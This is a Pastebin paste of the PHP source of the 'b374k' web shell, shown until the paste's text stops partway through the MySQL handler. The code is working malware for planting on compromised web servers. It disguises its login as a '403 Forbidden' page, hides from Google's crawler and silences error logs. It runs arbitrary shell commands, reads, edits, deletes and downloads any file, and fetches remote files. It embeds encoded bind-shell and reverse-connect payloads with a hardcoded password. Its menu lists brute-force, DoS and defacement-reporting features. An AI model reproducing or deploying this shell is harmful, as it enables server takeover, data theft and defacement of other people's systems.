3x5w4rup

B374k Newbie3viLc063s

Oct 5th, 2014
580
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 127.79 KB | None | 0 0
  1.    
  2.  
  3.     <?php
  4.     /*********************************************************************************************************/
  5.     $auth_pass = "a61b1c3195845f12e1ba618cd9936fd9"; //password crypted with md5, default is 'Newbie3viLc063s'
  6.     /*********************************************************************************************************/
  7.     $color = "#00ff00";
  8.     $default_action = 'FilesMan';
  9.     @define('SELF_PATH', __FILE__);
  10.      
  11.     /*********************************************************************************************************/
  12.     # Avoid google's crawler
  13.    if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) { header('HTTP/1.0 404 Not Found'); exit; }
  14.     /*********************************************************************************************************/
  15.      
  16.     @session_start();
  17.     @error_reporting(0);
  18.     @ini_set('error_log',NULL);
  19.     @ini_set('log_errors',0);
  20.     @ini_set('max_execution_time',0);
  21.     @set_time_limit(0);
  22.     @set_magic_quotes_runtime(0);
  23.     @define('VERSION', 'v.2012');
  24.     @define('TITLE', ':: b374k Newbie3viLc063s 2012 ::');
  25.      
  26.     /*********************************************************************************************************/
  27.      
  28.     if( get_magic_quotes_gpc() )
  29.     {
  30.             function stripslashes_array($array) { return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array); }
  31.             $_POST = stripslashes_array($_POST);
  32.     }
  33.      
  34.     function logout()
  35.     {
  36.             unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
  37.             $page = $host='http://'.$_SERVER['SERVER_NAME'].'/'.$_SERVER['PHP_SELF'];
  38.             echo '<center><span class="b1">The System Is Going To Down For LogOut Administrator Pages!!</scan></center>';
  39.             ?>
  40.             <script>window.location.href = '<?php print $page; ?>';</script>
  41.             <?php
  42.             exit(0);
  43.     }
  44.      
  45.     function printLogin()
  46.     {
  47.             ?>
  48.     <html>
  49.             <head>
  50.             <style> input { margin:0;background-color:#fff;border:1px solid #fff; } </style>
  51.             </head>
  52.             <title>
  53.             403 Forbidden
  54.             </title>
  55.             <body>
  56.             <h1>Forbidden</h1>
  57.             <p>You don't have permission to access this file on this server <?=$_SERVER['HTTP_HOST']?>.</p>
  58.             <hr>
  59.             <form method=post>
  60.             <address>Apache/2.2.8 at <?=$_SERVER['HTTP_HOST']?> Port 80<center><input type=password name=x><input type=submit value=''></center></address>
  61.             </form>
  62.             </body>
  63.     </html>
  64.             <?php
  65.             exit;
  66.     }
  67.      
  68.     if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
  69.             {
  70.             if( empty( $auth_pass ) || ( isset( $_POST['x'] ) && ( md5($_POST['x']) == $auth_pass ) ) )
  71.                     { $_SESSION[md5($_SERVER['HTTP_HOST'])] = true; }
  72.             else
  73.                     { printLogin(); }
  74.             }
  75.      
  76.     if(isset($_GET['dl']) && ($_GET['dl'] != ""))
  77.             {
  78.             $file   = $_GET['dl'];
  79.             $filez  = @file_get_contents($file);
  80.             header("Content-type: application/octet-stream");
  81.             header("Content-length: ".strlen($filez));
  82.             header("Content-disposition: attachment;
  83.            filename=\"".basename($file)."\";");
  84.             echo $filez;
  85.             exit;
  86.             }
  87.      
  88.     elseif(isset($_GET['dlgzip']) && ($_GET['dlgzip'] != ""))
  89.             {
  90.             $file = $_GET['dlgzip'];
  91.             $filez = gzencode(@file_get_contents($file));
  92.             header("Content-Type:application/x-gzip\n");
  93.             header("Content-length: ".strlen($filez));
  94.             header("Content-disposition: attachment; filename=\"".basename($file).".gz\";");
  95.             echo $filez; exit;
  96.             }
  97.      
  98.     if(isset($_GET['img']))
  99.             {
  100.             @ob_clean();
  101.             $d = magicboom($_GET['y']);
  102.             $f = $_GET['img'];
  103.             $inf = @getimagesize($d.$f);
  104.             $ext = explode($f,".");
  105.             $ext = $ext[count($ext)-1];
  106.             @header("Content-type: ".$inf["mime"]);
  107.             @header("Cache-control: public");
  108.             @header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
  109.             @header("Cache-control: max-age=".(60*60*24*7));
  110.             @readfile($d.$f);
  111.             exit;
  112.             }
  113.     $ver = VERSION;
  114.     $software = getenv("SERVER_SOFTWARE");
  115.      
  116.     if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") $safemode = TRUE;
  117.     else $safemode  = FALSE;
  118.     $system         = @php_uname();
  119.      
  120.     if(strtolower(substr($system,0,3)) == "win") $win = TRUE;
  121.     else $win       = FALSE;
  122.      
  123.     if(isset($_GET['y']))
  124.             { if(@is_dir($_GET['view'])){ $pwd = $_GET['view']; @chdir($pwd); } else{ $pwd = $_GET['y']; @chdir($pwd); } }
  125.      
  126.     if(!$win)
  127.             { if(!$user = rapih(exe("whoami"))) $user = ""; if(!$id = rapih(exe("id"))) $id = ""; $prompt = $user." \$ "; $pwd = @getcwd().DIRECTORY_SEPARATOR; }
  128.     else
  129.             {
  130.             $user   = @get_current_user();
  131.             $id     = $user;
  132.             $prompt = $user." &gt;";
  133.             $pwd    = realpath(".")."\\";
  134.             $v      = explode("\\",$d);
  135.             $v      = $v[0];
  136.             foreach (range("A","Z") as $letter)
  137.                     {
  138.                     $bool = @is_dir($letter.":\\");
  139.                     if ($bool)
  140.                             {
  141.                             $letters        .= "<a href=\"?y=".$letter.":\\\">[ ";
  142.                             if ($letter.":" != $v) {$letters .= $letter;}
  143.                             else {$letters  .= "<span class=\"gaya\">".$letter."</span>";}
  144.                             $letters        .= " ]</a> ";
  145.                             }
  146.                     }
  147.             }
  148.      
  149.     if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE;
  150.     else $posix = FALSE;
  151.      
  152.             $server_ip      = @gethostbyname($_SERVER["HTTP_HOST"]);
  153.             $my_ip          = $_SERVER['REMOTE_ADDR'];
  154.             $bindport       = "55555";
  155.             $bindport_pass  = "Newbie3viLc063s";
  156.             $pwds           = explode(DIRECTORY_SEPARATOR,$pwd);
  157.             $pwdurl         = "";
  158.             for($i = 0 ; $i < sizeof($pwds)-1 ; $i++)
  159.                     {
  160.                     $pathz  = "";
  161.                     for($j  = 0 ; $j <= $i ; $j++)
  162.                             {
  163.                             $pathz .= $pwds[$j].DIRECTORY_SEPARATOR;
  164.                             }
  165.                     $pwdurl .= "<a href=\"?y=".$pathz."\">".$pwds[$i]." ".DIRECTORY_SEPARATOR." </a>";
  166.                     }
  167.      
  168.             if(isset($_POST['rename'])){ $old = $_POST['oldname']; $new = $_POST['newname']; @rename($pwd.$old,$pwd.$new); $file = $pwd.$new; }
  169.             $buff = $software."<br />";
  170.             $buff .= $system."<br />";
  171.             if($id != "") $buff .= $id."<br />";
  172.             $buff .= "server ip : ".$server_ip." <span class=\"gaya\">|</span> your ip : <span class=\"your_ip\">".$my_ip."</span><br />";
  173.             if($safemode) $buff .= "safemode <span class=\"gaya\">ON</span><br />";
  174.             else $buff .= "safemode <span class=\"gaya\">OFF<span><br />";
  175.             $buff .= $letters."&nbsp;&gt;&nbsp;".$pwdurl;
  176.      
  177.             function rapih($text){ return trim(str_replace("<br />","",$text)); }
  178.      
  179.             function magicboom($text){ if (!get_magic_quotes_gpc()) { return $text; } return stripslashes($text); }
  180.      
  181.             function showdir($pwd,$prompt)
  182.             {
  183.                     $fname = array();
  184.                     $dname = array();
  185.                     if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE;
  186.                     else $posix = FALSE;
  187.                     $user = "????:????";
  188.                     if($dh = opendir($pwd))
  189.                             {
  190.                             while($file = readdir($dh))
  191.                                     {
  192.                                     if(is_dir($file))
  193.                                             { $dname[] = $file; }
  194.                                     elseif(is_file($file))
  195.                                             { $fname[] = $file; }
  196.                                     }
  197.                             closedir($dh);
  198.                             }
  199.                     sort($fname);
  200.                     sort($dname);
  201.                     $path = @explode(DIRECTORY_SEPARATOR,$pwd);
  202.                     $tree = @sizeof($path);
  203.                     $parent = "";
  204.                     $buff = "<form action=\"?y=".$pwd."&amp;x=shell\" method=\"post\" style=\"margin:8px 0 0 0;\">
  205.                                    <table class=\"cmdbox\" style=\"width:50%;\">
  206.                                    <tr>
  207.                                    <td>CMD@$prompt</td>
  208.                                    <td><input onMouseOver=\"this.focus();\" id=\"cmd\" class=\"inputz\" type=\"text\" name=\"cmd\" style=\"width:400px;\" value=\"\" />
  209.                                    <input class=\"inputzbut\" type=\"submit\" value=\"Execute !\" name=\"submitcmd\" style=\"width:80px;\" /></td>
  210.                                    </tr>
  211.                            </form>
  212.                            <form action=\"?\" method=\"get\" style=\"margin:8px 0 0 0;\">
  213.                                    <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
  214.                                    <tr>
  215.                                    <td>view file/folder</td>
  216.                                    <td><input onMouseOver=\"this.focus();\" id=\"goto\" class=\"inputz\" type=\"text\" name=\"view\" style=\"width:400px;\" value=\"".$pwd."\" />
  217.                                    <input class=\"inputzbut\" type=\"submit\" value=\"Enter !\" name=\"submitcmd\" style=\"width:80px;\" /></td>
  218.                                    </tr>
  219.                            </form>
  220.                            </table>
  221.                            <table class=\"explore\">
  222.                                    <tr>
  223.                                    <th>name</th>
  224.                                    <th style=\"width:80px;\">size</th>
  225.                                    <th style=\"width:210px;\">owner:group</th>
  226.                                    <th style=\"width:80px;\">perms</th>
  227.                                    <th style=\"width:110px;\">modified</th>
  228.                                    <th style=\"width:190px;\">actions</th>
  229.                                    </tr> ";
  230.      
  231.                     if($tree > 2) for($i=0;$i<$tree-2;$i++) $parent .= $path[$i].DIRECTORY_SEPARATOR;
  232.                     else $parent = $pwd;
  233.                     foreach($dname as $folder)
  234.                             {
  235.                             if($folder == ".")
  236.                                     {
  237.                                     if(!$win && $posix)
  238.                                             {
  239.                                             $name=@posix_getpwuid(@fileowner($folder));
  240.                                             $group=@posix_getgrgid(@filegroup($folder));
  241.                                             $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
  242.                                             }
  243.                                     else { $owner = $user; }
  244.                                     $buff .= "<tr>
  245.                                                    <td><a href=\"?y=".$pwd."\">$folder</a></td>
  246.                                                    <td>-</td>
  247.                                                    <td style=\"text-align:center;\">".$owner."</td>
  248.                                                    <td>".get_perms($pwd)."</td>
  249.                                                    <td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($pwd))."</td>
  250.                                                    <td><span id=\"titik1\">
  251.                                                            <a href=\"?y=$pwd&amp;edit=".$pwd."newfile.php\">newfile</a>
  252.                                                            | <a href=\"javascript:tukar('titik1','titik1_form');\">newfolder</a>
  253.                                                        </span>
  254.                                                    <form action=\"?\" method=\"get\" id=\"titik1_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  255.                                                            <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
  256.                                                            <input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" />
  257.                                                            <input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go\" />
  258.                                                    </form>
  259.                                                    </td>
  260.                                            </tr> ";
  261.                                     }
  262.                             elseif($folder == "..")
  263.                                     {
  264.                                     if(!$win && $posix)
  265.                                             {
  266.                                             $name=@posix_getpwuid(@fileowner($folder));
  267.                                             $group=@posix_getgrgid(@filegroup($folder));
  268.                                             $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
  269.                                             }
  270.                                     else    { $owner = $user; }
  271.                                     $buff .= "<tr>
  272.                                                    <td><a href=\"?y=".$parent."\">$folder</a></td>
  273.                                                    <td>-</td>
  274.                                                    <td style=\"text-align:center;\">".$owner."</td>
  275.                                                    <td>".get_perms($parent)."</td>
  276.                                                    <td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($parent))."</td>
  277.                                                    <td><span id=\"titik2\">
  278.                                                            <a href=\"?y=$pwd&amp;edit=".$parent."newfile.php\">newfile</a>
  279.                                                            | <a href=\"javascript:tukar('titik2','titik2_form');\">newfolder</a>
  280.                                                        </span>
  281.                                                    <form action=\"?\" method=\"get\" id=\"titik2_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  282.                                                            <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
  283.                                                            <input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" />
  284.                                                            <input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go\" />
  285.                                                    </form>
  286.                                                    </td>
  287.                                            </tr>";
  288.                                     }
  289.                             else
  290.                                     {
  291.                                     if(!$win && $posix)
  292.                                             {
  293.                                             $name=@posix_getpwuid(@fileowner($folder));
  294.                                             $group=@posix_getgrgid(@filegroup($folder));
  295.                                             $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
  296.                                             }
  297.                                     else { $owner = $user; }
  298.                                     $buff .= "<tr>
  299.                                                    <td>
  300.                                                    <a id=\"".clearspace($folder)."_link\" href=\"?y=".$pwd.$folder.DIRECTORY_SEPARATOR."\">[ $folder ]</a>
  301.                                                    <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($folder)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  302.                                                            <input type=\"hidden\" name=\"oldname\" value=\"".$folder."\" style=\"margin:0;padding:0;\" />
  303.                                                            <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$folder."\" />
  304.                                                            <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
  305.                                                            <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\"
  306.                                                            onclick=\"tukar('".clearspace($folder)."_form','".clearspace($folder)."_link');\" />
  307.                                                    </form>
  308.                                                    </td>
  309.                                                    <td>DIR</td>
  310.                                                    <td style=\"text-align:center;\">".$owner."</td>
  311.                                                    <td>".get_perms($pwd.$folder)."</td>
  312.                                                    <td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($folder))."</td>
  313.                                                    <td><a href=\"javascript:tukar('".clearspace($folder)."_link','".clearspace($folder)."_form');\">rename</a>
  314.                                                    | <a href=\"?y=$pwd&amp;fdelete=".$pwd.$folder."\">delete</a>
  315.                                                    </td>
  316.                                                    </tr>";
  317.                                     }
  318.                             }
  319.                     foreach($fname as $file)
  320.                             {
  321.                             $full = $pwd.$file;
  322.                             if(!$win && $posix)
  323.                                     {      
  324.                                     $name=@posix_getpwuid(@fileowner($file));
  325.                                     $group=@posix_getgrgid(@filegroup($file));
  326.                                     $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
  327.                                     }
  328.                             else { $owner = $user; }
  329.                             $buff .= "<tr>
  330.                                            <td><a id=\"".clearspace($file)."_link\" href=\"?y=$pwd&amp;view=$full\">$file</a>
  331.                                            <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($file)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  332.                                                    <input type=\"hidden\" name=\"oldname\" value=\"".$file."\" style=\"margin:0;padding:0;\" />
  333.                                                    <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$file."\" />
  334.                                                    <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
  335.                                                    <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\"
  336.                                                            onclick=\"tukar('".clearspace($file)."_link','".clearspace($file)."_form');\" />
  337.                                            </form> </td>
  338.                                            <td>".ukuran($full)."</td>
  339.                                            <td style=\"text-align:center;\">".$owner."</td>
  340.                                            <td>".get_perms($full)."</td>
  341.                                            <td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($full))."</td>
  342.                                            <td><a href=\"?y=$pwd&amp;edit=$full\">edit</a>
  343.                                            | <a href=\"javascript:tukar('".clearspace($file)."_link','".clearspace($file)."_form');\">rename</a>
  344.                                            | <a href=\"?y=$pwd&amp;delete=$full\">delete</a>
  345.                                            | <a href=\"?y=$pwd&amp;dl=$full\">download</a>&nbsp;(<a href=\"?y=$pwd&amp;dlgzip=$full\">gz</a>)
  346.                                            </td>
  347.                                    </tr>";
  348.                             }
  349.                     $buff .= "</table>"; return $buff;
  350.             }
  351.      
  352.             function ukuran($file)
  353.             {
  354.                     if($size = @filesize($file))
  355.                             {      
  356.                             if($size <= 1024) return $size;
  357.                             else
  358.                                     {
  359.                                     if($size <= 1024*1024)
  360.                                             { $size = @round($size / 1024,2);; return "$size kb"; }
  361.                                     else { $size = @round($size / 1024 / 1024,2); return "$size mb"; }
  362.                                     }
  363.                             }
  364.                     else return "???";
  365.             }
  366.      
  367.             function exe($cmd)
  368.             {
  369.                     if(function_exists('system'))
  370.                             {
  371.                             @ob_start();
  372.                             @system($cmd);
  373.                             $buff = @ob_get_contents();
  374.                             @ob_end_clean();
  375.                             return $buff;
  376.                             }
  377.                     elseif(function_exists('exec'))
  378.                             {
  379.                             @exec($cmd,$results);
  380.                             $buff = "";
  381.                             foreach($results as $result)
  382.                                     { $buff .= $result; }
  383.                             return $buff;
  384.                             }
  385.                     elseif(function_exists('passthru'))
  386.                             {
  387.                             @ob_start();
  388.                             @passthru($cmd);
  389.                             $buff = @ob_get_contents();
  390.                             @ob_end_clean();
  391.                             return $buff;
  392.                             }
  393.                     elseif(function_exists('shell_exec'))
  394.                             {
  395.                             $buff = @shell_exec($cmd);
  396.                             return $buff;
  397.                             }
  398.             }
  399.      
  400.             function tulis($file,$text)
  401.             {
  402.             $textz = gzinflate(base64_decode($text));
  403.             if($filez = @fopen($file,"w"))
  404.                     {
  405.                     @fputs($filez,$textz);
  406.                     @fclose($file);
  407.                     }
  408.             }
  409.      
  410.             function ambil($link,$file)
  411.             {
  412.             if($fp = @fopen($link,"r"))
  413.                     {
  414.                     while(!feof($fp))
  415.                             {
  416.                             $cont.= @fread($fp,1024);
  417.                             }
  418.                     @fclose($fp);
  419.                     $fp2 = @fopen($file,"w");
  420.                     @fwrite($fp2,$cont);
  421.                     @fclose($fp2);
  422.                     }
  423.             }
  424.      
  425.             function which($pr)
  426.             {
  427.             $path = exe("which $pr");
  428.             if(!empty($path))
  429.                     { return trim($path); }
  430.             else { return trim($pr); }
  431.             }
  432.      
  433.             function download($cmd,$url)
  434.             {
  435.             $namafile = basename($url);
  436.             switch($cmd)
  437.                     {
  438.                     case 'wwget': exe(which('wget')." ".$url." -O ".$namafile); break;
  439.                     case 'wlynx': exe(which('lynx')." -source ".$url." > ".$namafile); break;
  440.                     case 'wfread' : ambil($wurl,$namafile);break;
  441.                     case 'wfetch' : exe(which('fetch')." -o ".$namafile." -p ".$url);break;
  442.                     case 'wlinks' : exe(which('links')." -source ".$url." > ".$namafile);break;
  443.                     case 'wget' : exe(which('GET')." ".$url." > ".$namafile);break;
  444.                     case 'wcurl' : exe(which('curl')." ".$url." -o ".$namafile);break;
  445.                     default: break; }
  446.             return $namafile;
  447.             }
  448.      
  449.             function get_perms($file)
  450.             {
  451.                     if($mode=@fileperms($file))
  452.                             {
  453.                             $perms='';
  454.                             $perms .= ($mode & 00400) ? 'r' : '-';
  455.                             $perms .= ($mode & 00200) ? 'w' : '-';
  456.                             $perms .= ($mode & 00100) ? 'x' : '-';
  457.                             $perms .= ($mode & 00040) ? 'r' : '-';
  458.                             $perms .= ($mode & 00020) ? 'w' : '-';
  459.                             $perms .= ($mode & 00010) ? 'x' : '-';
  460.                             $perms .= ($mode & 00004) ? 'r' : '-';
  461.                             $perms .= ($mode & 00002) ? 'w' : '-';
  462.                             $perms .= ($mode & 00001) ? 'x' : '-';
  463.                             return $perms;
  464.                             }
  465.                     else return "??????????";
  466.             }
  467.      
  468.             function clearspace($text){ return str_replace(" ","_",$text); }
  469.      
  470.             $port_bind_bd_c="bVNhb9owEP2OxH+4phI4NINAN00aYxJaW6maxqbSLxNDKDiXxiLYkW3KGOp/3zlOpo7xIY793jvf +fl8KSQvdinCR2NTofr5p3br8hWmhXw6BQ9mYA8lmjO4UXyD9oSQaAV9AyFPCNRa+pRCWtgmQrJE P/GIhufQg249brd4nmjo9RxBqyNAuwWOdvmyNAKJ+ywlBirhepctruOlW9MJdtzrkjTVKyFB41ZZ dKTIWKb0hoUwmUAcwtFt6+m+EXKVJVtRHGAC07vV/ez2cfwvXSpticytkoYlVglX/fNiuAzDE6VL 3TfVrw4o2P1senPzsJrOfoRjl9cfhWjvIatzRvNvn7+s5o8Pt9OvURzWZV94dQgleag0C3wQVKug Uq2FTFnjDzvxAXphx9cXQfxr6PcthLEo/8a8q8B9LgpkQ7oOgKMbvNeThHMsbSOO69IA0l05YpXk HDT8HxrV0F4LizUWfE+M2SudfgiiYbONxiStebrgyIjfqDJG07AWiAzYBc9LivU3MVpGFV2x1J4W tyxAnivYY8HVFsEqWF+/f7sBk2NRQKcDA/JtsE5MDm9EUG+MhcFqkpX0HmxGbqbkdBTMldaHRsUL ZeoDeOSFBvpefCfXhflOpgTkvJ+jtKiR7vLohYKCqS2ZmMRj4Z5gQZfSiMbi6iqkdnHarEEXYuk6 uPtTdumsr0HC4q5rrzNifV7sC3ZWUmq+LVlVa5OfQjTanZYQO+Uf";
  471.             $port_bind_bd_pl="ZZJhT8IwEIa/k/AfjklgS2aA+BFmJDB1cW5kHSZGzTK2Qxpmu2wlYoD/bruBIfitd33uvXuvvWr1 NmXRW1DWy7HImo02ebRd19Kq1CIuV3BNtWGzQZeg342DhxcYwcCAHeCWCn1gDOEgi1yHhLYXzfwg tNqKeut/yKJNiUB4skYhg3ZecMETnlmfKKrz4ofFX6h3RZJ3DUmUFaoTszO7jxzPDs0O8SdPEQkD e/xs/gkYsN9DShG0ScwEJAXGAqGufmdq2hKFCnmu1IjvRkpH6hE/Cuw5scfTaWAOVE9pM5WMouM0 LSLK9HM3puMpNhp7r8ZFW54jg5wXx5YZLQUyKXVzwdUXZ+T3imYoV9ds7JqNOElQTjnxPc8kRrVo vaW3c5paS16sjZo6qTEuQKU1UO/RSnFJGaagcFVbjUTCqeOZ2qijNLWzrD8PTe32X9oOgvM0bjGB +hecfOQFlT4UcLSkmI1ceY3VrpKMy9dWUCVCBfTlQX6Owy8=";
  472.      
  473.             $back_connect="fZFRS8MwFIXfB/sPWSw2hUrnqyPC0CpD3KStvqh0XRpcsE1KkoKF/XiTtCIV6tu55+Z89yY5W0St ktGB8aihsprPWkVBKsgn1av5zCN1iQGsOv4Fbak6pWmNgU/JUQC4b3lRU3BR7OFqcFhptMOpo28j S2whVulCflCNvXVy//K6fLdWI+SPcekMVpSlxIxTnRdacDSEAnA6gZJRBGMphbwC3uKNw8AhXEKZ ja3ImclYagh61n9JKbTAhu7EobN3Qb4mjW/byr0BSnc3D3EWgqe7fLO1whp5miXx+tHMcNHpGURw Tskvpd92+rxoKEdpdrvZhgBen/exUWf3nE214iT52+r/Cw3/5jaqhKL9iFFpuKPawILVNw=="; $back_connect_c="XVHbagIxEH0X/IdhhZLUWF1f1YKIBelFqfZJliUm2W7obiJJLLWl/94k29rWhyEzc+Z2TjpSserA BYyt41JfldftVuc3d7R9q9mLcGeAEk5660sVAakc1FQqFBxqnhkBVlIDl95/3Wa43fpotyCABR95 zzpzYA7CaMq5yaUCK1VAYpup7XaYZpPE1NArIBmBRzgVtVYoJQMcR/jV3vKC1rI6wgSmN/niYb75 i+21cR4pnVYWUaclivcMM/xvRDjhysbHVwde0W+K0wzH9bt3YfRPingClVCnim7a/ZuJC0JTwf3A RkD0fR+B9XJ2m683j/PpPYHFavW43CzzzWyFIfbIAhBiWinBHCo4AXSmFlxiuPB3E0/gXejiHMcY jwcYguIAe2GMNijZ9jL4GYqTSB9AvEmHGjk/m19h1CGvPoHIY5A1Oh2tE3XIe1bxKw77YTyt6T2F 6f9wGEPxJliFkv5Oqr4tE5LYEnoyIfDwdHcXK1ilrfAdUbPPLw==";
  474.             ?>
  475.      
  476.     <html>
  477.             <head>
  478.                     <title><?php print TITLE; ?> <?php echo VERSION; ?></title>
  479.                     <script type="text/javascript">
  480.      
  481.                     function tukar(lama,baru)
  482.                             {
  483.                             document.getElementById(lama).style.display = 'none';
  484.                             document.getElementById(baru).style.display = 'block';
  485.                             }
  486.      
  487.                     </script>
  488.                     <style type="text/css">
  489.                             AKUSTYLE                { display:none; }
  490.                             body                    { background:#000000;; }
  491.                             a                       { text-decoration:none; }
  492.                             a:hover                 { border-bottom:1px solid #4C83AF; }
  493.                             *                       { font-size:11px; font-family:Tahoma,Verdana,Arial; color:#FFFFFF; }
  494.                             #menu                   { background:#111111; margin:2px 2px 2px 2px; }
  495.                             #menu a                 { padding:4px 18px; margin:0; background:#222222; text-decoration:none; letter-spacing:2px; }
  496.                             #menu a:hover           { background:#66CCFF; border-bottom:1px solid #333333; border-top:1px solid #333333; }
  497.                             .tabnet                 { margin:15px auto 0 auto; border: 1px solid #333333; }
  498.                             .main                   { width:100%; }
  499.                             .gaya                   { color: #4C83AF; }
  500.                             .your_ip                { color: #FF4719; }
  501.                             .inputz                 { background:#001A66; border:0; padding:2px; border-bottom:1px solid #222222; border-top:1px solid #222222; }
  502.                             .inputzbut              { background:#111111; color:#666666; margin:0 4px; border:1px solid #444444; }
  503.                             .inputz:hover,
  504.                             .inputzbut:hover        { border-bottom:1px solid #66CCFF; border-top:1px solid #66CCFF; color:#66CCFF; }
  505.                             .output                 { margin:auto; border:1px solid #4C83AF; width:100%; height:400px; background:#000000; padding:0 2px; }
  506.                             .cmdbox                 { width:100%; }
  507.                             .head_info              { padding: 0 4px; }
  508.                             .b1                     { font-size:30px; padding:0; color:#FF0000; }
  509.                             .b2                     { font-size:30px; padding:0; color: #FF9966; }
  510.                             .b_tbl                  { text-align:center; margin:0 4px 0 0; padding:0 4px 0 0; border-right:1px solid #333333; }
  511.                             .phpinfo table          { width:100%; padding:0 0 0 0; }
  512.                             .phpinfo td             { background:#111111; color:#cccccc; padding:6px 8px;; }
  513.                             .phpinfo th, th         { background:#191919; border-bottom:1px solid #333333; font-weight:normal; }
  514.                             .phpinfo h2,
  515.                             .phpinfo h2 a           { text-align:center; font-size:16px; padding:0; margin:30px 0 0 0; background:#222222; padding:4px 0; }
  516.                             .explore                { width:100%; }
  517.                             .explore a              { text-decoration:none; }
  518.                             .explore td             { border-bottom:1px solid #333333; padding:0 8px; line-height:24px; }
  519.                             .explore th             { padding:3px 8px; font-weight:normal; }
  520.                             .explore th:hover,
  521.                             .phpinfo th:hover       { border-bottom:1px solid #4C83AF; }
  522.                             .explore tr:hover       { background:#111111; }
  523.                             .viewfile               { background:#EDECEB; color:#000000; margin:4px 2px; padding:8px; }
  524.                             .sembunyi               { display:none; padding:0;margin:0; }
  525.                     </style>
  526.             </head>
  527.     <body onLoad="document.getElementById('cmd').focus();">
  528.             <div class="main">
  529.                     <!-- head info start here -->
  530.                     <div class="head_info">
  531.                             <table>
  532.                                     <tr>
  533.                                             <td>
  534.                                                     <table class="b_tbl">
  535.                                                             <tr>
  536.                                                                     <td>
  537.                                                                     <a href="?">
  538.                                                                     <span class="b1">b<span class="b2">3<span class="b1">7</span>4</span>k</span>
  539.                                                                     </a>
  540.                                                                     </td>
  541.                                                             </tr>
  542.                                                             <tr>
  543.                                                                     <td>m1n1 Newbie3viLc063s <?php echo $ver; ?></td>
  544.                                                             </tr>
  545.                                                     </table>
  546.                                             </td>
  547.                                             <td>
  548.                                                     <?php echo $buff; ?>
  549.                                             </td>
  550.                                     </tr>
  551.                             </table>      
  552.                     </div>
  553.                     <!-- head info end here -->
  554.                     <!-- menu start -->
  555.                     <div id="menu">
  556.                             <a href="?<?php echo "y=".$pwd; ?>">                    <b>Explore</b></a>
  557.                             <a href="?<?php echo "y=".$pwd; ?>&amp;x=shell">        <b>Shell</b></a>
  558.                             <a href="?<?php echo "y=".$pwd; ?>&amp;x=php">          <b>Eval</b></a>
  559.                             <a href="?<?php echo "y=".$pwd; ?>&amp;x=mysql">        <b>MySQL</b></a>
  560.                             <a href="?<?php echo "y=".$pwd; ?>&amp;x=phpinfo">      <b>PHP</b></a>
  561.                             <a href="?<?php echo "y=".$pwd; ?>&amp;x=netsploit">    <b>NetSploit</b></a>
  562.                             <a href="?<?php echo "y=".$pwd; ?>&amp;x=upload">       <b>Upload</b></a>
  563.                             <a href="?<?php echo "y=".$pwd; ?>&amp;x=mail">         <b>Mail</b></a>
  564.                             <a href="?<?php echo "y=".$pwd; ?>&amp;x=brute">        <b>BruteForce</b></a>
  565.                             <a href="?<?php echo "y=".$pwd; ?>&amp;x=readable">     <b>OpenDIR</b></a>
  566.                             <a href="?<?php echo "y=".$pwd; ?>&amp;x=dos">          <b>D0S</b></a>
  567.                             <a href="?<?php echo "y=".$pwd; ?>&amp;x=localdomain">  <b>LocalDomain</b></a>
  568.                             <a href="?<?php echo "y=".$pwd; ?>&amp;x=zone-h">        <b>Zone-H</b></a>
  569.                             <a href="?x=out">               <b>Log-Out</b></a>
  570.                     </div>
  571.                     <!-- menu end -->
  572.      
  573.                     <?php
  574.                     if(isset($_GET['x']) && ($_GET['x'] == 'out')) { logout(); }
  575.                     elseif(isset($_GET['x']) && ($_GET['x'] == 'php'))
  576.                             {
  577.                             ?>
  578.     <form action="?y=<?php echo $pwd; ?>&amp;x=php" method="post">
  579.     <table class="cmdbox">
  580.     <tr>
  581.     <td>
  582.     <textarea class="output" name="cmd" id="cmd"><? eval(gzinflate(base64_decode(''))); ?></textarea>
  583.     </td>
  584.     </tr>
  585.     <tr>
  586.     <td>
  587.                                                     <input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="submitcmd" />
  588.                                             </td>
  589.                                     </tr>
  590.                             </table>
  591.                             </form>
  592.                             <?php
  593.                             }
  594.                     elseif(isset($_GET['x']) && ($_GET['x'] == 'mysql'))
  595.                             {
  596.                                     if(isset($_GET['sqlhost']) && isset($_GET['sqluser']) && isset($_GET['sqlpass']) && isset($_GET['sqlport']))
